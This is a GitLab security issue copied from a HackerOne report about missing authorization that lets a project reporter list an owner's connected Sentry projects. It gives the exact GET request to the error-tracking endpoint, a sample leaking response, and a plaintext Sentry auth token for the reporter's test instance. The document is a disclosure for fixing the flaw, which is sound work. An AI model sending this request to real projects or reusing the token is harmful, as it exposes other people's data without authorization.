A project reporter can leak owner's Sentry instance projects

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1947211 by js_noob on 2023-04-14, assigned to @dcouture:

Report | Attachments | How To Reproduce

Report

Summary

Hello team, as a part of the project error tracking a user (owner or maintainer) can connect Sentry to GitLab to track different project errors. This step allows the "owner" to connect to Sentry to fetch the available projects, this should only be available to "owners", this can be done by clicking the Connect button on Project Settings => Monitor => Error Tracking, checking the below screenshot. However, even a project reporter can fetch the connected Sentry instance projects.

Steps to reproduce

As an owner:

1. Create a new ultimate trial group, and create a new project in that group
2. Enable Sentry error tracking by going to https://gitlab.com/GROUP/PROJECT/-/settings/operations under Error tracking, you can use my Sentry instance, and choose any project in the drop-down:
   * Sentry API URL: https://xyz-6jv.sentry.io/
   * Auth Token: a6d9c60bd9254c19995af8f0502b6d9aa2412dd92e724204a8b948e52b87dfc1

3. Invite a reporter to the project/group

As the reporter:

4. Navigate to https://gitlab.com/GROUP/PROJECT/-/settings/operations and verify that you are blocked
5. Send the following request, to grab all the Sentry instance projects. Change the api_host if you used your own instance

GET /GROUP/PROJECT/-/error_tracking/projects?api_host=https://xyz-6jv.sentry.io/&token=* HTTP/2  
Host: gitlab.com  
Cookie: REDACTED  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Csrf-Token: REDACTED  
X-Requested-With: XMLHttpRequest  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers  

6. The response should look similar to the one below, leaking all projects

{"projects":[{"id":"4505012306182144","name":"secret-project","status":"active","slug":"secret-project","organization_name":"XYZ","organization_id":"4505012227342336","organization_slug":"xyz-6jv"},{"id":"4505012228915200","name":"javascript","status":"active","slug":"javascript","organization_name":"XYZ","organization_id":"4505012227342336","organization_slug":"xyz-6jv"}]}  

NB: I know that this exploitation requires knowing the sentry domain, there are a lot of ways that this can be done, a couple of examples if the reporter was a maintainer and was demoted or simply by brute force. However, the "real" bug/issue here is the missing authorization on -/error_tracking/projects

Video/POC

bandicam_2023-04-14_14-56-04-252.mp4

Impact

A project reporter can leak the owner's Sentry instance projects by knowing the domain without auth token.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• image.png
• image.png
• bandicam_2023-04-14_14-56-04-252.mp4

How To Reproduce

Please add reproducibility information to this section: